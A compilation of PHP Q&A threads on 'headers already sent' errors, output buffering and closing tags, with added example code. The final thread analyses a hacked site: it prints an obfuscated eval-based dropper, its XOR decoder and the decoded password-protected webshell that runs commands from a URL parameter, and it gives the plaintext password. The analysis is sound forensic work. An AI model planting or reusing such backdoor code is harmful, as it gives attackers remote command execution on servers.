Cannot send session cache limiter - no spaces [duplicate] - php

This question already has answers here:
How to fix "Headers already sent" error in PHP
Closed 8 years ago.
Getting this error:
Warning: session_start() [function.session-start]: Cannot send session
cache limiter - headers already sent (output started at
/home/apspec/public_html/home.php:105) in
/home/apspec/public_html/login.php on line 1
I've done some searching and don't see any spaces. My session start is at line 1. I think I had this error once before and something on the server was adding a space. Is there a way to check if that is the case? Any other ideas?

Dressing up jeoroen's comment:
Just because you might have written <?php session_start(); right at the start of a file, doesn't necessarily mean it's the beginning of the script! As shown by your error, you have output beginning in home.php at line 105. Perhaps you have some header stuff there, then you called include login.php; to begin session stuff.
While "nothing must come before it" is a good rule of thumb, the more accurate rule is "the script must not send output before it". Personally, I have session_start() called two layers of included files deep and even then it's somewhere around line 60 (making games means I have a LOT of init code!) but output does not begin until after all code has run - in fact, in my latest project the very last line of code to run is $template->output();, a function which takes all of the work done so far and dresses it up in all the HTML it needs.
That last point is actually quite important. Many people, especially experienced programmers, will emphasise the importance of separating your layers. At its simplest, use external CSS and JS files instead of inlining stuff in your HTML, to separate content from style from functionality. The same applies to PHP. Ideally you should avoid outputting HTML willy-nilly in your code, instead your code should do all the processing it needs and then output it at the end.
Smarty is a widely-used engine for this, but in that project I mentioned earlier $template->output() just creates a clean function scope, imports the prepared data, and calls require $file.".tpl.php"; so I can have some final post-processing. I figured that was easier than installing an entire third-party engine :p I... I have trust issues with code other people wrote. Years ago, I lost gigabytes of forum posts to a glitch in phpBB... -shivers-
Anyway, hope this rambling helps!
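The layout the answer describes, as an added example rather than code from the answerer's project: session_start() lives in a bootstrap routine (it could be several includes deep), all decisions are made with no output, and the last thing the script does is hand prepared data to a template rendered in a clean function scope. The Template class, file names and the throwaway .tpl.php written to the temp directory are assumptions for the example; PHP 8 is assumed.

```php
<?php
// Added example: "process first, output last". Nothing below echoes a
// byte until $tpl->output() runs at the very end of the script.
declare(strict_types=1);

// Everything that must run before any output, wherever it is included from.
function bootstrap(): void
{
    if (PHP_SAPI !== 'cli' && session_status() === PHP_SESSION_NONE) {
        session_start();   // safe here: no output has been produced yet
    }
}

// Minimal stand-in for $template->output(): clean function scope, the
// prepared data imported as local variables, then the .tpl.php is required.
final class Template
{
    /** @var array<string, mixed> */
    private array $vars = [];

    public function assign(string $name, mixed $value): void
    {
        $this->vars[$name] = $value;
    }

    public function output(string $file): void
    {
        // static closure: the template sees only the assigned variables,
        // not $this and not the caller's locals.
        $render = static function (string $__file, array $__vars): void {
            extract($__vars, EXTR_SKIP);
            require $__file;
        };
        $render($file, $this->vars);
    }
}

bootstrap();

// ---- processing phase: decide what to show; still no output ------------
$tpl = new Template();
$tpl->assign('title', 'Home');
$tpl->assign('user', $_SESSION['user'] ?? 'guest');
$tpl->assign('items', ['alpha', 'beta']);

// Constructed template so the example is self-contained; in a real project
// this is a home.tpl.php file on disk (hypothetical name).
$tplFile = tempnam(sys_get_temp_dir(), 'tpl');
file_put_contents($tplFile, <<<'TPL'
<!doctype html>
<title><?= htmlspecialchars($title, ENT_QUOTES) ?></title>
<p>Hello, <?= htmlspecialchars($user, ENT_QUOTES) ?></p>
<ul>
<?php foreach ($items as $item): ?>
  <li><?= htmlspecialchars($item, ENT_QUOTES) ?></li>
<?php endforeach; ?>
</ul>
TPL);

// ---- output phase: the very last thing the script does ------------------
$tpl->output($tplFile);
unlink($tplFile);
```

With this shape a redirect or a cookie can be issued anywhere in the processing phase without buffering tricks, because the only code that writes to the client is the final output() call; escaping in the template is where output encoding belongs, since the processing code never touches HTML.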

Related

Using ob_start() is suboptimal (not optimized) and fills the RAM?

Using an output buffer requires the server to store the entire output of the PHP in RAM, so if I have a large page, I'll wind up using a fair amount of memory - and the server will also have to wait until the entire page is generated before sending it out, which could cause a small delay. Is that right?
I don't want to know the advantage of using ob_start();. My problem is redirecting and this error: Headers already sent.
So to solve that problem, I used ob_start(); at the start of my code, something like this:
<?php ob_start(); ?>
<?php
// 500 lines of code is here
header('Location: http://www.example.com/test.php');
?>
<html>
<!-- 1000 lines of HTML is here -->
</html>
<?php ob_end_flush(); ?>
Now my problem has been solved; I just want to know: is everything OK? Is my code optimized? If my requests rise, will my site be delayed?
thanks
The proper solution to the "Headers already sent" problem is described in a previous thread.
Basically, the correct course of action is to move all of the processing code above any output to the browser. Then simply echo out the results, as needed, in between the HTML code.
Not only will you notice an improvement in the resource usage of the page, but you'll also notice that it will become a whole lot easier to actually read and write the code.
If the output branches are complex enough, which means anything above a very basic script (simple guestbook, etc), a template engine might be well worth the time and effort to look at.
Output buffering is frequently used and I wouldn't worry about this. For example, this SO webpage takes up ~ 64 KiB, meaning 16384 of these pages fit in 1 GiB ram simultaneously.
Probably offtopic, but if you're going to send a Location header, do you even need to execute all the other code? You could just send the header and exit() immediately.
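Putting the two answers together, as an added example that is not code from either answerer: the decision logic is a pure function with no output, the redirect is issued before a single byte is sent and exits immediately, and the redirect helper refuses to proceed when output has already started instead of emitting the warning the question shows. The login check, the allow-listed host and the target URL are assumptions for the example; PHP 8.1+ is assumed for the never return type.

```php
<?php
// Added example: decide first, redirect-and-exit early, render only on the
// fall-through path.
declare(strict_types=1);

/** Issue a redirect and stop. Never returns. */
function redirect(string $url, int $status = 303): never
{
    // Only relative targets or an allow-listed host: a user-influenced $url
    // must not turn this helper into an open redirect.
    $allowedHosts = ['www.example.com'];          // assumption for the example
    $host = parse_url($url, PHP_URL_HOST);
    if ($host !== null && !in_array($host, $allowedHosts, true)) {
        throw new InvalidArgumentException("refusing redirect to $host");
    }

    // This is exactly the condition behind "headers already sent": report
    // where output began instead of silently failing.
    if (headers_sent($file, $line)) {
        throw new LogicException("cannot redirect: output started at $file:$line");
    }
    header('Location: ' . $url, true, $status);
    exit;   // nothing after the Location header needs to run
}

/**
 * Pure decision logic: no output, so it can run anywhere before rendering.
 * Returns the redirect target, or null when the form should be shown.
 * The hard-coded credential is a stand-in for a real password check.
 */
function handleLogin(array $post, array &$session): ?string
{
    $user = (string) ($post['user'] ?? '');
    $pass = (string) ($post['pass'] ?? '');
    if ($user === 'alice' && hash_equals('secret', $pass)) {
        $session['user'] = 'alice';
        return '/test.php';
    }
    return null;
}

$session = [];
$target = handleLogin($_POST, $session);
if ($target !== null) {
    redirect($target);          // nothing has been echoed yet, so this is safe
}

// Only now does output begin.
echo "<form method=\"post\">\n",
     "  <input name=\"user\"> <input name=\"pass\" type=\"password\">\n",
     "  <button>Log in</button>\n",
     "</form>\n";
```

The 303 status is deliberate: after a POST it tells the browser to fetch the target with GET, so a refresh on the landing page does not resubmit the form.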

Is there anything wrong with using buffering to circumvent a "headers already sent" error? [duplicate]

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
“Warning: Headers already sent” in PHP
I'm getting an error:
Warning: Cannot modify header information - headers already sent by (output started at /home/content/52/5148252/html/ruhuna/common/header.php:8) in /home/content/52/5148252/html/ruhuna/login.php on line 115
I know error is caused by white space but I couldn't find any blank space in my files. Therefore I added ob_start() to my header.php and the problem went away.
Am I likely to encounter any problems due to adding ob_start?
I didn't use ob_flush(), is that going to cause any problems?
If so, where would I need to add ob_flush()?
Just took a look at your code. When you change header information, you can't have anything output to the site before you try to change it. This includes any HTML, etc. You have HTML before trying to change the header; this is what the problem is.
ob_start() is safe. Sometimes if you have a very long-running script it would be better if the user could see some output as the script progresses, which ob_start() will stop from happening. But that is not normally a problem.

PHP redirect in include fails [duplicate]

This question already has answers here:
How to fix "Headers already sent" error in PHP
Closed 9 years ago.
I am trying to implement a fairly complex 3rd party script that consists of several interconnected scripts. I've included the intro of the script in a simple page of mine. The script basically writes different things to a string based on logic and echoes the string at the end. Sometimes it echoes a form and when you click on submit, the script runs again and based on the new logic echoes different text that displays fine inside my page where it is included in place of the earlier form. (The 3rd party script included in my page also has some includes of its own.)
My problem is that rather than have it echo some of the things it echoes, notably error or success messages, on occasion I would like to have it redirect to another page on my site.
I've done this successfully with other pages of mine. I include a script in a page that writes some header type code. Based on certain parameters or actions by the user that recall the script, the include may redirect to itself or another page. The only thing I have to make sure is that there are no spaces or text written in the course of the include prior to the redirect.
However, working with this third-party script, although I think I've removed all the white space, it is not letting me redirect. The error message cites the code written in my page that includes the 3rd party script. Here is the msg:
Warning: Cannot modify header information - headers already sent by (output started at /blah blah/stepone.php:5).
Step one is my simple page that calls the 3rd party script.
Am I right that an include can redirect in response to a user action even if there is some text currently displayed? Should I just be checking the third party scripts for white space or is there some structural thing I may be doing wrong.
The 3rd party scripts are too large to put in here otherwise I would put them in.
Thanks.
What you need, probably, is ob_start(). This buffers the output and enables you to redirect, even when output is already generated.
Also check out the manual: http://php.net/manual/en/function.ob-start.php
The error you have mentioned happens because the headers have already been sent to the browser, and when it tries to send the header again it throws an error. So, for example,
when you try doing something like this:
echo 'Hello World';
header('Location:some/location.php');
it might throw you an error. Hence it is always good to place the redirect header on top. But sometimes we may not want that; in such a case you can turn on output buffering by using PHP's ob_start(). According to PHP's definition:
This function will turn output buffering on. While output buffering is
active no output is sent from the script (other than headers), instead
the output is stored in an internal buffer
So instead of the example code above you can use something like:
ob_start();
echo 'Hello World';
header('Location:some/location.php');
ob_end_flush();
You have to:
use ob_start() at the beginning of your file.
use ob_end_flush() at the end of your file.
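A caveat on the ob_start() / ob_end_flush() pair, shown as an added example rather than the answerer's code: buffering does let header() succeed after output, but ob_end_flush() then ships everything buffered so far as the body of the 3xx response. On the redirect path, discard the buffers instead, and treat a non-empty buffer as a symptom (a BOM or bytes after ?> in some include) worth logging. The target URL and the use of error_log are assumptions; PHP 8.1+ is assumed for the never return type.

```php
<?php
// Added example: buffer from the first line, but on redirect throw the
// buffered output away rather than sending it along with the Location header.
declare(strict_types=1);

ob_start();

// ... the script's normal code, any of which may echo or leak whitespace ...
echo "Hello World\n";

/** Discard every open output buffer, log what was in it, redirect, and stop. */
function redirectDiscardingBuffer(string $url): never
{
    $stray = '';
    while (ob_get_level() > 0) {
        // Innermost buffer comes back first; prepend so the earliest
        // output ends up first in $stray.
        $stray = ob_get_clean() . $stray;
    }
    if ($stray !== '') {
        // Premature output is the real bug; record where to look.
        error_log(sprintf('redirect: discarded %d byte(s) of premature output: %s',
            strlen($stray), json_encode(substr($stray, 0, 80))));
    }
    header('Location: ' . $url, true, 303);
    exit;
}

$mustRedirect = true;   // stands in for the script's real decision

if ($mustRedirect) {
    redirectDiscardingBuffer('/some/location.php');
}

// Normal page path: send the buffered HTML.
ob_end_flush();
```

Note that ob_start() has to run in every entry point before any include; setting output_buffering in php.ini or using auto_prepend_file achieves the same thing without touching each file, but the discard-on-redirect step above is still needed if you want a clean 3xx response.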

Omitting Closing Php Tag [duplicate]

This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Why do some scripts omit the closing php tag '?>'?
I've been reading some articles about omitting closing PHP tags, since they say it is a good programming practice in PHP if your .php file doesn't contain any other things. There are many questions like that, but after I tried what they've done, so far it worked well on my machine. Maybe it is a fixed issue or something?
But I don't quite understand why it could be a good programming practice since it brings space or something but I've tried this one and works very well.
Master.php
<?php
echo "Master.php";
include "Slave.php";
header("Location:Slave.php");
?>
Slave.php
<?php
echo "Slave.php";
?>
I don't really quite get what the problem should be if I didn't use closing php tag.
Thanks.
The main issue is you may include additional whitespace (but it can be any chars) after the closing ?> (besides one \n which PHP allows, thanks Mario).
This extra whitespace appears to PHP as output to be sent. This makes PHP start sending the response body, therefore making any additional headers being set/modified impossible.
This is hard to debug (as whitespace is generally invisible in text editors) and often the cause of the dreaded Headers already sent error.
The problem with the closing tag is that any whitespace after the last ?> may cause bugs and is very difficult to detect while bug fixing.
It is usually better to NOT end your script with closing PHP tag.
In your case a whitespace could remain after ?> (it is very sneaky and hard to tell where error is if something breaks because of this reason), so it would be considered as output and you won't be able to start session, for example or pass headers in case if you are developing a website.
Just my opinion. I likely never end my scripts with closing tag
The problem comes from having any number of line breaks other than 1: some php parsers get upset if there isn't a newline at that end, but if you have more than one, it is printed since anything outside php tags is considered HTML.
The most common problem is that a library/model file will have an extra line break, causing the headers to be sent long before the page/view is instantiated.
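The invisible output the answers describe is easy to find mechanically. The following added example (not from the answers) scans .php files for the two usual culprits: a UTF-8 BOM ahead of the open tag, and bytes after the final ?> beyond the single newline PHP swallows. The sample files are constructed in the temp directory; PHP 8 is assumed for str_starts_with().

```php
<?php
// Added example: find stray bytes that become premature output.
declare(strict_types=1);

/** @return list<string> human-readable findings for one file */
function checkFile(string $path): array
{
    $src = file_get_contents($path);
    $findings = [];

    if (str_starts_with($src, "\xEF\xBB\xBF")) {
        $findings[] = "$path: UTF-8 BOM before <?php (3 bytes of output)";
    } elseif (!str_starts_with($src, '<?')) {
        $findings[] = "$path: does not begin with an open tag (leading whitespace?)";
    }

    // Heuristic: the last "?>" in the file is taken as the closing tag.
    $pos = strrpos($src, '?>');
    if ($pos !== false) {
        $tail = substr($src, $pos + 2);
        // PHP discards exactly one newline (\n or \r\n) directly after ?>;
        // anything else is sent to the client before any later header().
        if ($tail !== '' && $tail !== "\n" && $tail !== "\r\n") {
            $findings[] = sprintf('%s: %d byte(s) after final ?> : %s',
                $path, strlen($tail), json_encode($tail));
        }
    }
    return $findings;
}

// Constructed samples.
$dir = sys_get_temp_dir() . '/tagcheck_' . getmypid();
mkdir($dir);
file_put_contents("$dir/good.php",    "<?php\necho 'ok';\n");          // no closing tag
file_put_contents("$dir/also_ok.php", "<?php\necho 'ok';\n?>\n");      // one newline is swallowed
file_put_contents("$dir/bad.php",     "<?php\necho 'ok';\n?>\n\n");    // second newline is output
file_put_contents("$dir/bom.php",     "\xEF\xBB\xBF<?php\necho 'ok';\n");

foreach (glob("$dir/*.php") as $file) {
    foreach (checkFile($file) as $finding) {
        echo $finding, "\n";
    }
    unlink($file);
}
rmdir($dir);
```

Expect bad.php and bom.php to be reported and the other two to pass. The final-?> heuristic can misfire on a file that embeds "?>" in a string or in trailing HTML, so treat a hit as something to open in a hex editor rather than as proof.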

What is the vulnerability in my PHP code? [duplicate]

This question already has answers here:
When is eval evil in php?
Closed 3 years ago.
A website of mine was recently hacked. Although the actual website remain unchanged, they were somehow able to use the domain to create a link that re-directed to an ebay phishing scam.
I've taken the website down, for obvious reasons, so I can't link to the code. I'm wondering how I can go about finding out what vulnerability they used so that I can avoid this problem in the future. The page used PHP, and also some javascript (for form validation).
Is there a free service that will scan my code for vulnerabilities? What are my other options?
Thanks,
Jeff
EDIT: I've hosted the files at [link removed]
A few things to note: There are several files in the "funcs" folder, most of which aren't used, but I left them there just in case. The "new.php" (contents below) in the "data" folder is clearly the problem. The big question is, how did someone manage to upload "new.php" to the server? There's also an RTF of the e-mail I received which has info about the scam.
(caution: this code is probably "dangerous" to your computer)
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("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")));
?>
Interesting stuff going on here. The php block evaluates to a nice little "code generator":
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
When the nasty variable names are substituted for something more readable, you get:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
which, when evaluated, spits out the code:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
Of note, the string: '417379a25e41bd0ac88f87dc3d029485' is the md5 hash of the password: Zrhenjq2009
I'll kick this around some more tomorrow.
Edit:
Ok, so I spent a few more minutes playing with this. It's looking like a remote control script. So now that this page (new.php) is sitting on your server, If a user hits this page and passes a url parameter named 'pass' with a value of 'Zrhenjq2009', they are then able to execute an external command on the server by passing the command and arguments in the url as the parameter named 'c'. So this is turning out to be a code generator which creates a backdoor on the server. Pretty cool.
I pulled down the file you uploaded and ran new.php through VirusTotal.com and it appears to be an new (or substantially modified) trojan. Additionally, it appears that 51.php is the PHPSpy trojan: VirusTotal analysis, 74.php is the PHP.Shellbot trojan VirusTotal Analysis and func.php is "webshell by orb". Looks like someone dropped a nice hack kit on your server along with the ebay phishing scripts/pages referenced in the document you uploaded.
You should probably remove the file download link in your original post.
If you get your hands on the logs, might be interesting to take a look.
Enjoy.
If you're using a VCS (version control, like git, mercurial, subversion, cvs) you can just do a diff from the last good commit and go from there.
You are using version control, right?
Do you have access to the server logs? If you have an approximate time when the first exploit occurred, they should go a long way toward helping you figure out what the person did. Other than giving general advice, it's really hard to say without more information.
Can you share the code (please make sure to remove user names / passwords etc)? If so I would be willing to take a look but it might take me a day or so (Sorry, I'm currently working on a SQL Injection Vulnerability report, recommendation for identifying restricted data, and future standards/process to prevent it in the future and I have four kids at home including a 3 month old).
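The answer above peeled new.php by hand: resolve the strrev()-hidden function names, run the decoder chain, then undo a single-byte XOR. The following added example (not code from the thread, and not the real payload) does the same mechanically, and never calls eval() on anything it decodes. Both inputs are constructed here: a dropper with the same strrev + eval(gzinflate(base64_decode())) shape, and a webshell-like string XORed with key 70 as in the answer.

```php
<?php
// Added example: static deobfuscation of an eval()-based dropper.
declare(strict_types=1);

// Step 1: turn "$prv=strrev('edoced_46esab'); ... $prv(" into "base64_decode(".
function resolveReversedNames(string $src): string
{
    if (preg_match_all('/\$(\w+)\s*=\s*strrev\(\'([^\']*)\'\)\s*;/', $src, $m, PREG_SET_ORDER)) {
        foreach ($m as [, $var, $rev]) {
            $src = str_replace('$' . $var . '(', strrev($rev) . '(', $src);
        }
    }
    return $src;
}

// Step 2: for eval(f(g('literal'))) apply g then f, which are only ever
// pure decoders from a fixed allow-list. Returns the decoded next stage,
// or null if the chain contains anything not on the list.
function peelEval(string $src): ?string
{
    $safe = ['base64_decode', 'gzinflate', 'gzuncompress', 'str_rot13', 'strrev', 'urldecode'];
    $re = '/eval\s*\(\s*((?:\w+\s*\(\s*)+)([\'"])(.*?)\2\s*\)+\s*;/s';
    if (!preg_match($re, $src, $m)) {
        return null;
    }
    preg_match_all('/\w+/', $m[1], $fns);        // outermost decoder first
    $data = $m[3];
    foreach (array_reverse($fns[0]) as $fn) {     // apply innermost first
        if (!in_array($fn, $safe, true)) {
            return null;                          // unknown function: stop, do not guess
        }
        $data = $fn($data);
        if ($data === false) {
            return null;
        }
    }
    return $data;
}

// Step 3: single-byte XOR brute force, scored by how PHP-like the result is.
/** @return array{key:int, score:int, text:string} */
function xorRecover(string $blob): array
{
    $best = ['key' => 0, 'score' => -1, 'text' => ''];
    for ($k = 1; $k < 256; $k++) {
        $txt = $blob ^ str_repeat(chr($k), strlen($blob));   // byte-wise string XOR
        $score = substr_count($txt, '<?php') * 5 + substr_count($txt, '$_GET')
               + substr_count($txt, 'passthru') + substr_count($txt, 'eval');
        $printable = ctype_print(str_replace(["\n", "\r", "\t"], '', $txt));
        if ($printable && $score > $best['score']) {
            $best = ['key' => $k, 'score' => $score, 'text' => $txt];
        }
    }
    return $best;
}

// --- constructed sample 1: dropper shaped like new.php ---------------------
$inner   = "<?php echo 'stage two would live here'; ?>";
$dropper = "<?php\n\$prv=strrev('edoced_46esab');\n\$vrp=strrev('etalfnizg');\n"
         . "eval(\$vrp(\$prv('" . base64_encode(gzdeflate($inner)) . "')));\n?>";
$peeled  = peelEval(resolveReversedNames($dropper));
echo "peeled: ", $peeled ?? '(no decodable eval chain)', "\n";

// --- constructed sample 2: single-byte XOR layer, key 70 as in the answer --
$shell = "<?php if (isset(\$_GET['c'])) { passthru(\$_GET['c']); } ?>";
$blob  = $shell ^ str_repeat(chr(70), strlen($shell));
$hit   = xorRecover($blob);
echo "xor key {$hit['key']}: {$hit['text']}\n";
```

Running this prints the inner stage for sample 1 and recovers key 70 with the shell source for sample 2. Keeping eval() out of the loop is the point: a decoded stage may itself be a dropper, so feed it back through peelEval() instead of executing it, and do the whole exercise on a copy of the files off the compromised host.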
